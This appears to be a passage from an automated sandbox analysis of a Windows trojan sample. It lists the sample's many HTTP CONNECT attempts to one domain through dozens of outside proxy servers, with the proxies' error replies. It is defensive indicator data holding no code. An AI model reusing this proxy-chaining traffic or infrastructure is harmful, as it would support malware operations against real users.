                                                                                Feb 23, 2024 14:28:39.669487000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679485083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.695075035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.710423946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:03.710313082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:15.897852898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1686192.168.2.851407195.114.209.50805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.677087069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.703649044 CET835INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:42 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Content-Length: 643
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1687192.168.2.853920188.164.193.178630785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.692790031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.788522005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.882762909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.898021936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1688192.168.2.85137180.80.162.81108055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.693973064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1689192.168.2.854948172.245.16.47156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.698121071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1690192.168.2.853876176.120.32.13556785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.712519884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1691192.168.2.853750211.43.214.205805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.712630987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.898166895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.957258940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.960511923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.108778000 CET429INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:53 GMT
                                                                                Server: cloudflare
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 253
                                                                                CF-RAY: -
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1692192.168.2.854938192.252.216.8141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.739834070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1693192.168.2.854910115.171.217.4878915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.759352922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1694192.168.2.85492059.125.232.28805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.759887934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1695192.168.2.854943150.220.8.228643125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.774715900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1696192.168.2.854691109.123.254.43589175828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.785875082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.788778067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.882757902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1697192.168.2.854739120.234.203.17190025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.786197901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.800154924 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1698192.168.2.85492847.74.226.850015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.839930058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1699192.168.2.853823103.76.104.3080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.841485023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.420562029 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1700192.168.2.851391103.174.236.9880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.841485023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1701192.168.2.851518132.148.245.169498245828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.848524094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.898168087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.957256079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1702192.168.2.854955201.238.248.13992295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.870879889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.067732096 CET161INHTTP/1.1 503 Too many open connections
                                                                                Proxy-Agent: Privoxy 3.0.21
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1703192.168.2.854935107.148.201.157805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.893239021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695003986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.882603884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1704192.168.2.854936102.132.50.4980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.908921957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1705192.168.2.854676115.187.50.9956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.923393965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1706192.168.2.851475154.236.179.22619815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.925476074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.065356970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.085791111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1707192.168.2.854302198.12.253.138205828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.937309027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382515907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1708192.168.2.854976172.245.16.47156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.937458992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1709192.168.2.854023166.62.38.100393085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.937477112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.991976023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.992079020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.991852999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1710192.168.2.853974181.15.154.154520335828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.962357044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1711192.168.2.85495461.129.2.21280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.962811947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1712192.168.2.85497451.83.135.3528465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.962822914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1713192.168.2.85497079.110.197.14480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.990624905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1714192.168.2.85405137.187.91.192278985828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.990624905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.992058992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.992117882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1715192.168.2.854996104.24.35.152805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.990624905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.081738949 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1716192.168.2.85497285.14.8.22680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.991209984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
